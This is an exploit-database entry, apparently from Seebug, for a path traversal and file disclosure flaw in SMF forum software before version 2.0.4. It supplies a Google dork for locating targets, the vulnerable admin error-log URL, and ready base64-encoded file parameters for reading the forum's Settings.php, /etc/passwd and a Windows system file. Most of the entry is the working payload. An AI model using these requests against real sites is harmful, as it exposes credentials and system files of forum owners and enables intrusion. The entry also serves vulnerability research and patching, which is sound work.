# Exploit Title: SMF < 2.0.4 File Disclosure/Path Traversal # Google Dork: "Powered by SMF 2.0.x" # Date: 02/02/2013 # Exploit Author: NightlyDev # Software Link: http://download.simplemachines.org/index.php?thanks;filename=smf_2-0-3_install.zip # Version: 2.0.x < 2.0.4 # Tested on: CentOS 6.2 _ _ _ _ _ _ _____ _ | \ | (_) | | | | | | / ____| | | | \| |_ __ _| |__ | |_| |_ _| | ___ __| | ___ _ __ ___ | . ` | |/ _` | '_ \| __| | | | | | / _ \ / _` |/ _ \ '__/ __| | |\ | | (_| | | | | |_| | |_| | |___| (_) | (_| | __/ | \__ \ |_| \_|_|\__, |_| |_|\__|_|\__, |\_____\___/ \__,_|\___|_| |___/ __/ | __/ | |___/ |___/ You need the "admin_forum" privilege for this exploit. http://<server>/index.php?action=admin;area=logs;sa=errorlog;file=[BASE64 ENCODED FILE PATH];line=[LINE NUMBER] Example : /srv/www/smf/Settings.php : L3Nydi93d3cvc21mL1NldHRpbmdzLnBocA= /etc/passwd : L2V0Yy9wYXNzd2Q= SMF Configuration File Disclosure : file=L3Nydi93d3cvc21mL1NldHRpbmdzLnBocA=;line=40 /etc/passwd File : file=L2V0Yy9wYXNzd2Q=;line=1 C:\Windows\system.ini file=QzpcV2luZG93c1xzeXN0ZW0uaW5p;line=1 NightlyDev.
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论